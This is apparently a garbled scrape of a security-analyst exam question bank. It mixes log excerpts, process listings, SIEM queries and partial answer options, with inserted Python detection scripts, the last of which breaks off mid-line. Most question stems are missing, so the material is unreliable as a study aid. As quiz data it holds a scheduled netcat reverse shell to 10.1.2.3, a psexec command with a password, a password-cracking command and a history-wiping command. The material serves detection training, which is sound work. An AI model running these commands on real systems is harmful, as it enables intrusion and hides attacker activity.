Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2020-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443 10 1510 1
2020-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451 7 360 1
2020-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496 5 1107 1
2020-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443 11 1840 1
2020-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443 1 49 1
2020-07-11 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292 4 1392 1
2020-07-11 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443 4 462 1
2020-07-11 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443 2 89 1
2020-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443 4 263 1
2020-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443 18 2932 1
2020-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505 37 48125 1
2020-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515 2 1256 1
2020-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443 10 648 1
2020-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525 12 15792 1
2020-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443 31 1700 1
2020-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443 1 40 1
user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt
What is the user attempting to do?
ps, identify the process ID he should focus on:
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)
[ 21/Jul/2020:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2020:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2020:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2020:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2020:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2020:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1
malwr.com and receives the following information about its behavior. What type of tool is malwr.com?
ICMP "Echo request"
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.6:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.7:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.7:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.8:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.8:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.9:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.9:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.10:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.10:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.11:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.11:0->10.1.1.1:0.0 11 924 1
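The flow excerpts on this page (the asymmetric 9.1 G / 514 M pair and the ICMP table above) are the kind of nfdump text an analyst triages by hand. The script below is an added example, not part of the question bank: it parses that text layout, then flags one source sending ICMP echo requests to many hosts and any flow above a byte threshold. The SAMPLE records are constructed copies of the page's lines, and the thresholds are assumptions.

```python
"""Flow-record triage: ping sweeps and bulk transfers (added example)."""
import re
from collections import defaultdict
from ipaddress import ip_address

# One record per line: start, duration, proto, src:port->dst:port, packets, bytes, flows.
# For ICMP, nfdump prints type.code in the destination "port" column
# (8.0 = echo request, 0.0 = echo reply). Bytes may carry a unit ("9.1 G").
FLOW_RE = re.compile(
    r"^(?P<start>\S+ \S+)\s+(?P<duration>\S+)\s+(?P<proto>\S+)\s+"
    r"(?P<src>[\d.]+):(?P<sport>[\d.]+)->(?P<dst>[\d.]+):(?P<dport>[\d.]+)\s+"
    r"(?P<packets>\d+)\s+(?P<bytes>[\d.]+(?:\s*[KMG])?)\s+(?P<flows>\d+)\s*$"
)
UNIT = {"": 1, "K": 10**3, "M": 10**6, "G": 10**9}

# Constructed sample: the ICMP table and the two long TCP flows from this page.
SAMPLE = """\
Date flow start Duration Proto Src IP Addr:Port->Dst IP Addr:Port Packets Bytes Flows
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.6:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.6:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.7:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.7:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.8:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.8:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.9:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.9:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.10:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.10:0->10.1.1.1:0.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.1.1.1:0->10.2.2.11:8.0 11 924 1
2019-07-11 04:58:59.518 10.000 ICMP 10.2.2.11:0->10.1.1.1:0.0 11 924 1
2017-07-11 13:06:46.343 21601804 TCP 10.1.1.1:1151->10.2.2.3:443 9473640 9.1 G 1
2017-07-11 13:06:46.551 21601804 TCP 10.2.2.3:443->10.1.1.1:1151 8345101 514 M 1
"""


def parse_bytes(text):
    """Turn '924', '514 M' or '9.1 G' into an integer byte count."""
    m = re.fullmatch(r"([\d.]+)\s*([KMG]?)", text.strip())
    if not m:
        raise ValueError(f"unrecognised byte count: {text!r}")
    return int(round(float(m.group(1)) * UNIT[m.group(2)]))


def parse_flows(text):
    """Parse nfdump-style lines; the header row and blank lines are skipped."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Date"):
            continue
        m = FLOW_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["packets"] = int(rec["packets"])
        rec["bytes"] = parse_bytes(rec["bytes"])
        rec["flows"] = int(rec["flows"])
        flows.append(rec)
    return flows


def ping_sweep_sources(flows, min_targets=5):
    """Sources that sent ICMP echo requests to at least min_targets distinct hosts."""
    targets = defaultdict(set)
    for f in flows:
        if f["proto"] == "ICMP" and f["dport"].split(".")[0] == "8":
            targets[f["src"]].add(f["dst"])
    return {src: sorted(dsts, key=ip_address)
            for src, dsts in targets.items() if len(dsts) >= min_targets}


def bulk_transfers(flows, min_bytes=10**9):
    """Flows carrying at least min_bytes; long-lived large uploads deserve a look."""
    return [f for f in flows if f["bytes"] >= min_bytes]


if __name__ == "__main__":
    recs = parse_flows(SAMPLE)
    print("ping sweep:", ping_sweep_sources(recs))
    for f in bulk_transfers(recs):
        print("bulk:", f["src"], "->", f["dst"], f["bytes"], "bytes over", f["duration"], "s")
```

Both detectors key on the direction of the flow: the sweep counts echo requests (type 8) from one source, and the bulk check reports the side of the conversation that actually carried the bytes, which is what distinguishes a 9.1 G upload from its 514 M worth of acknowledgements.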
root@demo:~# md5sum -c demo.md5
demo.txt: FAILED
md5sum: WARNING: 1 computed checksum did NOT match
cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?
cmd.exe to VirusTotal.
cmd.exe to a known good version.
cmd.exe to make sure its behavior is normal.
Use the following scenario for questions 51–53.
Angela is a security practitioner at a midsize company that recently experienced a serious breach due to a successful phishing attack. The company has committed to changing its security practices across the organization and has assigned Angela to determine the best strategy to make major changes that will have a significant impact right away.
sysmon
sysgraph
resmon
resgraph
wmic.exe, powershell.exe, or winrm.vbs most likely indicate if you discover one or more was run on a typical end user's workstation?
Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute.
The average administrator at Lucy's organization is responsible for 150–300 machines.
What danger does Lucy's alert create?
sudo to assume root privileges, where is he most likely to find log information about what occurred?
sudoers file
/var/log/sudo
/var/log/auth.log
.bash_log
psexec \\10.0.11.1 -u Administrator -p examplepw cmd.exe
tcpdump data, Kwame discovers that hundreds of different IP addresses are sending a steady stream of SYN packets to a server on his network. What concern should Kwame have about what is happening?
Event ID 1005 MALWAREPROTECTION_SCAN_FAILED every day at the same time. What is the most likely cause of this issue?
ps -aux | grep apache2 | grep root
apache2.
apache2 and root both appearing in the output of ps.
apache2 processes run by root.
From: "John Smith, CIO" <[email protected]> with a Received: parameter that shows mail.demo.com [10.74.19.11].
Which of the following scenarios is most likely if demo.com is not a domain belonging to the same owner as example.com?
demo.com.
demo.com.
mail.demo.com server is a trusted email forwarding partner for example.com.
Sep 16 2019 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2019 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
What service is the remote system most likely attempting to access?
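The From / Received: question above turns on whether the first relay in the header chain belongs to the domain the sender claims. The script below is an added example, not part of the question bank: it walks the Received headers bottom-up (MTAs prepend them, so the last one is the earliest hop) and compares the first hop's domain with the From domain. Both messages are constructed; the sender address john.smith@example.com is an assumption, and the "registrable domain" helper is deliberately naive (last two labels) and would need a public-suffix list on real mail.

```python
"""Received-header origin check for a suspected spoofed message (added example)."""
import re
from email import message_from_string
from email.utils import parseaddr

# "from <helo-name> (<rdns> [<ip>])" as most MTAs write it; the parenthesised
# part is added by the receiving MTA and is the trustworthy half.
RECEIVED_FROM_RE = re.compile(
    r"\bfrom\s+(?P<helo>\S+)"
    r"(?:\s*\((?P<rdns>[^\s\[(]*)\s*\[(?P<ip>[^\]]+)\]\))?",
    re.IGNORECASE,
)

# Constructed message modelled on the page's scenario: From claims example.com,
# but the earliest hop is mail.demo.com [10.74.19.11].
SPOOFED = """\
Received: from mx.example.com (mx.example.com [203.0.113.10])
\tby inbound.example.com with ESMTP id 8fb1; Tue, 2 Jul 2019 09:14:02 -0500
Received: from mail.demo.com (mail.demo.com [10.74.19.11])
\tby mx.example.com with ESMTP id 3c2a; Tue, 2 Jul 2019 09:14:01 -0500
From: "John Smith, CIO" <john.smith@example.com>
To: finance@example.com
Subject: Urgent wire transfer

Please process the attached invoice today.
"""

# Constructed control message whose first hop is the sender's own domain.
LEGIT = """\
Received: from smtp.example.com (smtp.example.com [203.0.113.5])
\tby mx.example.com with ESMTP id 9d0e; Tue, 2 Jul 2019 09:20:11 -0500
From: "John Smith, CIO" <john.smith@example.com>
To: finance@example.com
Subject: Budget review

See you at 3pm.
"""


def relay_hops(raw):
    """Received hops in transit order (earliest first)."""
    msg = message_from_string(raw)
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        m = RECEIVED_FROM_RE.search(" ".join(hdr.split()))  # unfold the header first
        if m:
            hops.append({"helo": m["helo"].lower(),
                         "rdns": (m["rdns"] or "").lower(),
                         "ip": m["ip"]})
    return hops


def registrable(host):
    """Naive registrable domain: keep the last two labels (assumption, see lead-in)."""
    return ".".join(host.rstrip(".").split(".")[-2:])


def sender_domain(raw):
    return parseaddr(message_from_string(raw)["From"])[1].rsplit("@", 1)[-1].lower()


def analyse(raw, trusted_relays=()):
    """None when the first hop matches the From domain or a trusted relay, else details."""
    hops = relay_hops(raw)
    if not hops:
        return None
    first = hops[0]
    claimed = registrable(sender_domain(raw))
    observed = registrable(first["rdns"] or first["helo"])
    if observed == claimed or observed in {registrable(t) for t in trusted_relays}:
        return None
    return {"claimed": claimed, "first_hop": first["helo"],
            "rdns": first["rdns"], "ip": first["ip"]}


if __name__ == "__main__":
    print(analyse(SPOOFED))
    print(analyse(LEGIT))
```

Only the Received header written by your own MTA is beyond the sender's control; earlier hops can be forged, so a clean chain is weak evidence while a mismatched first hop is a strong prompt to check SPF/DKIM/DMARC results and the sending IP.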
[ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
[ 21/Jul/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
[ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
[ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
[ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
[ 21/Jul/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
select * from network-events where data.process.image.file = 'cmd.exe' AND data.process.parentImage.file != 'explorer.exe' AND data.process.action = 'launch'
explorer.exe typically do not launch command prompts.
cmd.exe should never launch explorer.exe.
explorer.exe provides administrative access to systems.
cmd.exe runs as administrator by default when launched outside of Explorer.
select source.name, data.process.cmd, count(*) AS hostcount
from windows-events where type = 'sysmon' AND
data.process.action = 'launch' AND data.process.image.file =
'reg.exe' AND data.process.parentImage.file = 'cmd.exe'
He then queries the returned data using the following script:
select source.name, data.process.cmd, count(*) AS hostcount
from network-events where type = 'sysmon' AND
data.process.action = 'launch' AND data.process.image.file =
'cmd.exe' AND data.process.parentImage.file = 'explorer.exe'
What events will Mark see?
explorer.exe where it is launched by cmd.exe
explorer.exe that modify cmd.exe
cmd.exe where it is launched by reg.exe
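The two queries above express parent/child process filters over Sysmon process-creation events. The script below is an added example, not part of the question bank: it applies the same filters (cmd.exe with a parent other than explorer.exe; reg.exe launched by cmd.exe, counted per host and command line) to a small set of constructed Sysmon-style records. The field names are assumptions rather than a real SIEM schema, and the hosts and command lines are invented for the example.

```python
"""Parent/child process filters over Sysmon-style records (added example)."""
from collections import Counter
from pathlib import PureWindowsPath

# Constructed command line for a Run-key persistence attempt.
REG_RUN_CMD = (r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run "
               r"/v Updater /t REG_SZ /d C:\Users\Public\u.exe")

# Constructed process events: host, action, image, parent image, command line.
SAMPLE_EVENTS = [
    {"host": "ws01", "action": "launch", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmd": "cmd.exe"},
    {"host": "ws02", "action": "launch", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r"cmd.exe /c start /min C:\Users\Public\u.exe"},
    {"host": "ws02", "action": "launch", "image": r"C:\Windows\System32\reg.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmd": REG_RUN_CMD},
    {"host": "ws02", "action": "launch", "image": r"C:\Windows\System32\reg.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmd": REG_RUN_CMD},
    {"host": "ws03", "action": "launch", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "cmd": "cmd.exe /c whoami"},
    {"host": "ws03", "action": "launch", "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmd": "explorer.exe"},
    {"host": "ws04", "action": "launch", "image": r"C:\Windows\System32\reg.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"reg query HKLM\SYSTEM\CurrentControlSet\Services"},
    {"host": "ws04", "action": "terminate", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmd": "cmd.exe"},
]


def image_name(path):
    """Case-insensitive file name, so C:\\Windows\\System32\\CMD.EXE matches 'cmd.exe'."""
    return PureWindowsPath(path).name.lower()


def launches_of(events, image, parent=None, parent_not=None):
    """Process-creation events for `image`, optionally constrained by parent name."""
    hits = []
    for e in events:
        if e["action"] != "launch" or image_name(e["image"]) != image:
            continue
        p = image_name(e["parent_image"])
        if parent is not None and p != parent:
            continue
        if parent_not is not None and p == parent_not:
            continue
        hits.append(e)
    return hits


def cmd_outside_explorer(events):
    """The page's first query: cmd.exe whose parent is anything but explorer.exe."""
    return launches_of(events, "cmd.exe", parent_not="explorer.exe")


def reg_via_cmd_by_host(events):
    """The page's second query: reg.exe launched by cmd.exe, counted per (host, cmd)."""
    return dict(Counter((e["host"], e["cmd"])
                        for e in launches_of(events, "reg.exe", parent="cmd.exe")))


if __name__ == "__main__":
    for e in cmd_outside_explorer(SAMPLE_EVENTS):
        print(e["host"], image_name(e["parent_image"]), "->", e["cmd"])
    print(reg_via_cmd_by_host(SAMPLE_EVENTS))
```

The direction of the filter is the whole point: cmd.exe with parent w3wp.exe or WINWORD.EXE is a classic web-shell or macro signal, while the ws03 record of explorer.exe launched by cmd.exe answers a different question and would not be returned by the first query.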
top
ls -mem
mem
memstat
Use the following scenario and image to answer questions 122–124.
While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop
to see a graphical representation of system resource usage. She sees the information shown in the following image:
htop?
ps
top
proc
load
term
stop
end
kill
netstat command, John sees the following output. What should his next action be?
[minesweeper.exe]
TCP 127.0.0.1:62522 dynamo:0 LISTENING
[minesweeper.exe]
TCP 192.168.1.100 151.101.2.69:https ESTABLISHED
ln /dev/null ~/.bash_history
What action was this user attempting to perform?
/dev/null to the Bash history
/dev/null
ls -la. What should her next action be after seeing this?
diff against the password file.
passwd binary against a known good version.
select timeInterval(date, '4h'), `data.login.user`,
count(distinct data.login.machine.name) as machinecount from
network-events where data.winevent.EventID = 4624 having
machinecount > 1
grep
more
less
strings
ps, identify the process ID he should focus on:
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)
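The ps listings on this page (here and in the earlier copy of the same question) ask the reader to spot the process that does not belong. The script below is an added example, not part of the question bank: it parses ps aux output and flags any process whose executable lives outside the packaged-software paths or inside a scratch directory. SAMPLE_PS is a constructed copy of the page's listing; the trusted-prefix list is an assumption for a stock Debian-style layout and should be tuned per build.

```python
"""Flag processes that run from unexpected paths in ps aux output (added example)."""
import re

# USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
PS_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<pid>\d+)\s+(?P<cpu>[\d.]+)\s+(?P<mem>[\d.]+)\s+"
    r"(?P<vsz>\d+)\s+(?P<rss>\d+)\s+(?P<tty>\S+)\s+(?P<stat>\S+)\s+"
    r"(?P<start>\S+)\s+(?P<time>[\d:]+)\s+(?P<command>.+)$"
)
# Assumption: where package-managed binaries live on this build.
TRUSTED_PREFIXES = ("/usr/sbin/", "/usr/bin/", "/usr/lib/", "/usr/libexec/",
                    "/sbin/", "/bin/", "/lib/")
SCRATCH_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed copy of the listing on this page.
SAMPLE_PS = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)
"""


def parse_ps(text):
    """Parse ps aux lines into dicts; the header row is skipped because PID is not numeric."""
    procs = []
    for line in text.splitlines():
        m = PS_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["pid"] = int(rec["pid"])
            rec["exe"] = rec["command"].split()[0]
            procs.append(rec)
    return procs


def suspicious_processes(procs, trusted=TRUSTED_PREFIXES):
    """(pid, user, exe, reason) for executables outside trusted paths."""
    flagged = []
    for p in procs:
        exe = p["exe"]
        if not exe.startswith("/"):
            # "(sd-pam)", "[kworker/0:1]" or bare names: no path to judge here.
            continue
        if exe.startswith(SCRATCH_PREFIXES):
            reason = "runs from a scratch/temp directory"
        elif not exe.startswith(trusted):
            reason = "runs from outside the packaged-software paths"
        else:
            continue
        flagged.append((p["pid"], p["user"], exe, reason))
    return flagged


if __name__ == "__main__":
    for hit in suspicious_processes(parse_ps(SAMPLE_PS)):
        print(*hit)
```

A path check is a first pass only; on a live host the next steps are to confirm the on-disk file against the package database (dpkg -S / rpm -Vf), read /proc/PID/exe and /proc/PID/cmdline directly in case ps was tampered with, and look at the process's open sockets.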
diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?
> root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
> daemon:*:16820:0:99999:7:::
> bin:*:16820:0:99999:7:::
> sys:*:16820:0:99999:7:::
> sync:*:16820:0:99999:7:::
> games:*:16820:0:99999:7:::
> man:*:16820:0:99999:7:::
> lp:*:16820:0:99999:7:::
> mail:*:16820:0:99999:7:::
> news:*:16820:0:99999:7:::
> uucp:*:16820:0:99999:7:::
> proxy:*:16820:0:99999:7:::
> www-data:*:16820:0:99999:7:::
> backup:*:16820:0:99999:7:::
> list:*:16820:0:99999:7:::
> irc:*:16820:0:99999:7:::
daemon has been added.
/etc/shadow and /etc/passwd cannot be diffed to create a useful comparison.
/var/log/auth.log. What is most likely occurring?
Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
iptables rule blocking root logins.
sudoers group.
sshd_config to deny root login.
at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe
What does it do?
netcat every Friday at 8:30 p.m.
AT command to dial a remote host via NetBIOS.
auth.log file on a Linux system she is responsible for, Tiffany discovers the following log entries:
Aug 6 14:13:06 demo sshd[5273]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=127.0.0.1 user=root
Aug 6 14:13:06 demo sshd[5273]: PAM service(sshd) ignoring max retries; 6> 3
Aug 6 14:13:07 demo sshd[5280]: Failed password for root from 127.0.0.1 port 38463 ssh2
Aug 6 14:13:07 demo sshd[5280]: error: maximum authentication attempts exceeded for root from 127.0.0.1 port 38463 ssh2 [preauth]
Aug 6 14:13:07 demo sshd[5280]: Disconnecting: Too many authentication failures [preauth]
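The two auth.log excerpts on this page (the burst of "Failed password for root" lines and the later MaxAuthTries lockout) are what a brute-force attempt looks like from sshd's side. The script below is an added example, not part of the question bank: it parses those line formats, counts failures per source and account inside a sliding window, counts the distinct sshd PIDs (parallel sessions) per source, and lists the sources sshd itself cut off. SAMPLE_LOG is a constructed copy of the page's lines plus one unrelated failure; the threshold and window are assumptions.

```python
"""sshd failed-login triage over auth.log lines (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[(?P<pid>\d+)\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)
MAX_RE = re.compile(
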